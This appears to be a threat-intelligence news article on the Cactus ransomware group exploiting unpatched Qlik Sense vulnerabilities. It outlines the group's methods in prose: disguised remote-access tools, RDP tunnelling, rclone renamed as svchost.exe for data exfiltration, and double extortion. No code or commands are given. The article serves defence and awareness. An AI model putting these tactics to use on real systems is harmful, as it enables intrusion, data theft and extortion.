The Cactus cyber criminal group is currently exploiting three different security flaws within the Qlik Sense platform, a versatile cloud analytics engine, in order to execute ransomware attacks.

In the past, Cactus criminals have targeted prominent global, commercial organizations; embarrassing victims by publishing their names and brief corresponding descriptions on a dark web leak channel

To avoid the Qlik Sense threat, understand the Cactus group’s tactics, techniques and procedures (TTPs). Keep reading to learn more:

Critical vulnerabilities 

In August, Qlik Sense released security updates pertaining to two critical vulnerabilities that affected the Windows version of the platform. One such vulnerability, tracked as CVE-2023-41266, could be used to generate anonymous sessions and perform HTTP requests to unauthorized endpoints.

The second vulnerability, tracked as CVE-2023-41265, with a critical severity of 9.8, can be leveraged for privilege elevation purposes and to execute HTTP requests on the backend server hosting the application. This bug doesn’t require authorization of any kind in order for hackers to exploit it.

In September, Qlik Sense found that the fix for CVE-2023-41265 failed to deliver and developers provided a new update. Afterwards, tracking for the issue resumed under a different CVE.

According to a recent cyber security research report, the ransomware group known as Cactus is actively exploiting the aforementioned flaws on publicly-exposed Qlik Sense instances that remain unpatched.

Breach methodology explained

These Cactus ransomware attacks prey on Qlik Sense’s security vulnerabilities and execute code that triggers the Qlik Sense Scheduler service to initiate new processes.

The cyber criminals employ PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and enable remote access to the machine:

  • ManageEngine UEMS executables posing as Qlik files
  • AnyDesk obtained directly from the official website
  • A Plink (PuTTY Link) binary renamed to “putty.exe”

In addition, Cactus executes multiple discovery commands redirecting output into .TTF files, believed by researchers to command output via path traversal.

To remain hidden and to gather information, Cactus changes the administrator password, establishes an RDP tunnel using the Plink command-line connection tool, and more.

In the final stage of the attack, the threat actors deploy the Cactus ransomware on the compromised system (highlighting the importance of securing Qlik Sense against sophisticated threats).

Additional attack information

Emerging evidence points to hackers skillfully employing RDP for discreet lateral movements. WizTree serves as a disk space analysis tool, while rclone, cleverly disguised as ‘svchost.exe,’ facilitates the covert exfiltration of data. The tools and techniques align with the patterns observed in previous Cactus ransomware attacks, as described by researchers.

Cactus ransomware group insights

The Cactus ransomware group made its debut in March of this year, immediately deploying the double-extortion ransomware tactic. This approach involves both stealing the victims’ data and encrypting it on compromised systems.

Researchers have underscored the significance of this ransomware operation due to its use of encryption to shield the malware binary from detection via security products.

This general vulnerability disclosure comes as the ransomware landscape becomes more sophisticated and as the ransomware economy has begun to scale.

To better protect your business, check out this CISO’s Guide to Ransomware prevention. Plus, explore advanced anti-ransomware technologies here. Lastly, to receive timely cyber security insights, exclusive interviews, and cutting-edge analyses, please sign up for the cybertalk.org newsletter.